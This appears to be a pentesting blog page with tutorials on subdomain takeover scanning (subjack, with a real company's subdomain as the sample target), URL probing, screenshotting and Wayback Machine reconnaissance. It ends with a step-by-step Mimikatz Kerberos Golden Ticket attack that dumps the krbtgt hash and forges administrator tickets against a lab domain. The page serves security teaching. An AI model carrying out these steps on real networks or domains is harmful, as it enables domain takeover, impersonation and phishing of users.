Vry4n_ | VK9 Security

[Active – Information Gathering] Subdomain take over

by Vry4n_ | Mar 10, 2024 | Active Gathering

Subjack is a Subdomain Takeover tool written in Go designed to scan a list of subdomains concurrently and identify ones that are able to be hijacked. With Go’s speed and efficiency, this tool really stands out when it comes to mass-testing. Always double check the results manually to rule out false positives.

Subjack will also check for subdomains attached to domains that don’t exist (NXDOMAIN) and are available to be registered. No need for dig ever again! This is still cross-compatible too.

Subdomain takeover vulnerabilities occur when a subdomain (subdomain.example.com) is pointing to a service (e.g. GitHub pages, Heroku, etc.) that has been removed or deleted. This allows an attacker to set up a page on the service that was being used and point their page to that subdomain. For example, if subdomain.example.com was pointing to a GitHub page and the user decided to delete their GitHub page, an attacker can now create a GitHub page, add a CNAME file containing subdomain.example.com, and claim subdomain.example.com.

https://github.com/haccer/subjack

There are several tools with dictionaries to check for possible takeovers:

Subdomain Takeover Generation via DNS Wildcard

When DNS wildcard is used in a domain, any requested subdomain of that domain that doesn’t have a different address explicitly will be resolved to the same information. This could be an A ip address, a CNAME…

For example, if *.testing.com is wilcarded to 1.1.1.1. Then, not-existent.testing.com will be pointing to 1.1.1.1.

However, if instead of pointing to an IP address, the sysadmin point it to a third party service via CNAME, like a github subdomain for example (sohomdatta1.github.io). An attacker could create his own third party page (in Gihub in this case) and say that something.testing.com is pointing there. Because, the CNAME wildcard will agree the attacker will be able to generate arbitrary subdomains for the domain of the victim pointing to his pages.

Exploiting a subdomain takeover

Subdomain takeover is essentially DNS spoofing for a specific domain across the internet, allowing attackers to set A records for a domain, leading browsers to display content from the attacker’s server. This transparency in browsers makes domains prone to phishing. Attackers may employ typosquatting or Doppelganger domains for this purpose. Especially vulnerable are domains where the URL in a phishing email appears legitimate, deceiving users and evading spam filters due to the domain’s inherent trust.

SSL Certificates

SSL certificates, if generated by attackers via services like Let’s Encrypt, add to the legitimacy of these fake domains, making phishing attacks more convincing.

Cookie Security and Browser Transparency

Browser transparency also extends to cookie security, governed by policies like the Same-origin policy. Cookies, often used to manage sessions and store login tokens, can be exploited through subdomain takeover. Attackers can gather session cookies simply by directing users to a compromised subdomain, endangering user data and privacy.

Emails and Subdomain Takeover

Another aspect of subdomain takeover involves email services. Attackers can manipulate MX records to receive or send emails from a legitimate subdomain, enhancing the efficacy of phishing attacks.

Higher Order Risks

Further risks include NS record takeover. If an attacker gains control over one NS record of a domain, they can potentially direct a portion of traffic to a server under their control. This risk is amplified if the attacker sets a high TTL (Time to Live) for DNS records, prolonging the duration of the attack.

Installation

1. Install subjack

go install github.com/haccer/subjack@latest

2. Display help menu

subjack -h

How to use

1. Find the fingerprints.json file

find -type f -name “fingerprints.json”

2. Run this tool against a subdomain list

subjack -w subdomains.txt -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3

3. Save the output to a file

subjack -w ./Desktop/URL-list.txt -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3 -o results.txt

4. Search by single domain,or sub-domain

subjack -d dev.tesla.com -t 100 -timeout 30 -o results.txt -ssl -c ./go/pkg/mod/github.com/haccer/subjack@v0.0.0-20201112041112-49c51e57deab/fingerprints.json -v 3

Options

-d test.com if you want to test a single domain.
-w domains.txt is your list of subdomains.
-t is the number of threads (Default: 10 threads).
-timeout is the seconds to wait before timeout connection (Default: 10 seconds).
-o results.txt where to save results to. For JSON: -o results.json
-ssl enforces HTTPS requests which may return a different set of results and increase accuracy.
-a skips CNAME check and sends requests to every URL. (Recommended)
-m flag the presence of a dead record, but valid CNAME entry.
-v verbose. Display more information per each request.
-c Path to configuration file.

Mitigation

Removing vulnerable DNS records – This is effective if the subdomain is no longer required.
Claiming the domain name – Registering the resource with the respective cloud provider or repurchasing an expired domain.
Regular monitoring for vulnerabilities – Tools like aquatone can help identify susceptible domains. Organizations should also revise their infrastructure management processes, ensuring that DNS record creation is the final step in resource creation and the first step in resource destruction.

Sources

https://www.hackerone.com/application-security/guide-subdomain-takeovers

https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover

https://github.com/EdOverflow/can-i-take-over-xyz

https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers

[Active – Information Gathering] Check alive URLs from a list using httprobe

by Vry4n_ | Mar 10, 2024 | Active Gathering

Take a list of domains and probe for working http and https servers.

https://github.com/tomnomnom/httprobe

Installation

1. Download the tool

go install github.com/tomnomnom/httprobe@latest

2. Get help menu

httprobe -h

How to use

1. Run the tool against a file (HTTP & HTTPS)

cat URL-list.txt | httprobe

2. Check against HTTPS only

cat URL-list.txt | httprobe -s -p https:443

3. In order to filter by the domain & subdomain only

cat URL-list.txt | httprobe | sed ‘s/https\?:\/\///’ | tr -d “:443”

[Active – Information Gathering] Automated screenshot of websites with goWitness

by Vry4n_ | Mar 10, 2024 | Passive Gathering

gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working.

https://github.com/sensepost/gowitness.git

Inspiration for gowitness comes from Eyewitness. If you are looking for something with lots of extra features, be sure to check it out along with these other projects

https://github.com/RedSiege/EyeWitness

https://github.com/breenmachine/httpscreenshot

goWitness requires Chrome or Chromium installed

Installation

1. For installation information and other documentation, please refer to the wiki

https://github.com/sensepost/gowitness/wiki

https://github.com/sensepost/gowitness/wiki/Installation

2. To install run

go install gorm.io/gorm@latest
go install github.com/sensepost/gowitness@latest
sudo apt install chromium

3. Display the menu

gowitness -h

4. Take a sincreenshow to a single URL, the ourput is saved in ./screenshots/filename.png

gowitness single https://vk9-sec.com/

5. Run against a file containing a list

gowitness file -f URL-list.txt

[Information Gathering] Gathering old information from WayBackMachine using waybackurls

by Vry4n_ | Mar 10, 2024 | Passive Gathering

Waybackurls is a command-line tool used for scraping URLs from the Wayback Machine.

Waybackurls is important for cybersecurity professionals because it allows them to uncover historical data about a website, identify potential vulnerabilities, and assess the security posture of a target.

https://github.com/tomnomnom/waybackurls

Basic Usage

waybackurls <target>: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target.
waybackurls <target> -json: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target in JSON format.
waybackurls <target> | grep <keyword>: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target that contain the specified keyword.
waybackurls <target> | sort -u: This command retrieves all the unique URLs of the Wayback Machine archive for the specified domain or target.
waybackurls <target> | httprobe: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target and tests them for HTTP/HTTPS connectivity.

Advanced Usage

waybackurls <target> | grep -Eo “(http|https)://[a-zA-Z0-9./?=_%:-]*”|sort -u: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target, and uses regex to extract only the URLs that begin with “http” or “https”.
waybackurls <target> -exclude <exclude-file>: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target, but excludes the URLs listed in the specified file.
waybackurls <target> -filter “status_code:200″|sort -u: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target that return a 200 status code.
waybackurls <target> | unfurl paths | sort | uniq -c | sort -rn: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target, extracts only the paths, and sorts them by the number of occurrences to identify the most commonly accessed paths.
waybackurls <target> | xargs -I{} curl -s -L -I -H “User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0” {} | grep -iE “x-frame-options|content-security-policy”: This command retrieves all the URLs of the Wayback Machine archive for the specified domain or target, and tests them for X-Frame-Options and Content-Security-Policy headers.

Integrations

Using waybackurls with Nmap: By combining the results of Nmap with waybackurls, a cybersecurity professional can gather information about any web-based services that may be exposed on the target network.
Using waybackurls with Gobuster: Gobuster is a tool used for directory and file brute-forcing on web servers. By using the URLs gathered by waybackurls, a cybersecurity professional can perform more targeted directory and file brute-forcing.
Using waybackurls with Sublist3r: By combining the results of Sublist3r with waybackurls, a cybersecurity professional can gather information about the web-based services running on subdomains of the target domain.
Using waybackurls with Burp Suite: By feeding the URLs gathered by waybackurls into Burp Suite’s spidering feature, a cybersecurity professional can identify additional web application endpoints that may be vulnerable to attack.

Installation

1. Having GoLang already installed in your system run

go install github.com/tomnomnom/waybackurls@latest

2. Display the help menu

waybackurls -h

How to use

1. Query a domain

echo “https://vk9-sec.com” | waybackurls

2. Run it against a file that contains a list of URLs

cat file.txt | waybackurls

[Active Directory] Kerberos Golden ticket

by Vry4n_ | Mar 9, 2024 | Active Directory

With Kerberos, users never directly authenticate themselves to the various services they need to use, such as file servers. Instead, the Kerberos Key Distribution Center (KDC) functions as a trusted third-party authentication service. Every domain controller in an Active Directory domain runs a KDC service.

The KDC issues a ticket granting ticket (TGT), which includes a unique session key and a timestamp that specifies how long that session is valid (normally 8 or 10 hours). When the user needs access to resources, they don’t have to re-authenticate; their client machine simply sends the TGT along to prove that the user has already been recently authenticated.

Kerberos Golden Ticket hacking is a sophisticated attack that exploits weaknesses in the Kerberos authentication protocol, which is widely used for securing authentication in various network environments. In this attack, adversaries create a forged Kerberos Ticket Granting Ticket (TGT), referred to as a “Golden Ticket,” allowing them to gain unauthorized access to a network and impersonate any user without the need for valid credentials.

Requirements

Privileged Access:

The attacker needs elevated privileges to access the KDC database or extract password hashes, often obtained through a successful compromise of an administrative account.

In a Golden Ticket attack, hackers bypass the KDC and create TGTs themselves to get access to various resources. To forge a TGT, hackers need four key pieces of information:

The FQDN (Fully Qualified Domain Name) of the domain
The SID (Security Identifier) of the domain
The username of the account they want to impersonate
The KRBTGT password hash

Exploitation (Mimikatz)

1. After compromising the domain controller, use mimikatz to dump the krbtgt hash

lsadump::lsa /inject /name:krbtgt
privilege::debug

2. Grab the following (NTLM, SID domain)

NTLM : 43ee24a65422dd3e241dda802463c4de
Domain : LAB / S-1-5-21-2564449761-2250179813-2142005236
aes256_hmac (4096) : 20e985711889035d33aff3f05781370c1d095cf7abf0dcfe9bb64f70c3dc0bea

3.. Generate the Kerberos ticket, assigned to a real user, use the admin account RID (default 500), and set ptt

kerberos::golden /User:Administrator /domain:lab.local /sid:S-1-5-21-2564449761-2250179813-2142005236 /krbtgt:43ee24a65422dd3e241dda802463c4de /id:500 /ptt
kerberos::golden /User:Administrator /domain:lab.local /sid:S-1-5-21-2564449761-2250179813-2142005236 /krbtgt:43ee24a65422dd3e241dda802463c4de /id:500,513,2668 /ptt /aes256:20e985711889035d33aff3f05781370c1d095cf7abf0dcfe9bb64f70c3dc0bea
kerberos::golden /domain:lab.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:43ee24a65422dd3e241dda802463c4de /user:newAdmin /id:500 /ptt

/domain — The FQDN of the domain
/sid — The SID of the domain
/aes256 — The AES-256 password hash of the KRBTGT user (alternatively, /ntlm or /rc4 can be used for NTLM hashes, and /aes128 for AES-128)
/user — The username to be impersonated
/groups — The list of groups (by RID) to include in the ticket, with the first being the user’s primary group
/ptt — Indicates that the forged ticket should be injected into the current session instead of being written to a file

4. Once, the ticket has been generated you can run commands to remote machines, with this command you will open a new CMD

misc::cmd

5. List the available tickets

klist

5. Test connecting to another machine

dir \\client-2\c$

Because the TGT is signed and encrypted with the real KRBTGT password hash, any domain controller will accept it as proof of identity and issue ticket-granting service (TGS) tickets for it.

As the adversary discovers more about the environment, they can continue to mint tickets for accounts with specific group membership to access any application, database or other resource that uses Active Directory for authentication and authorization.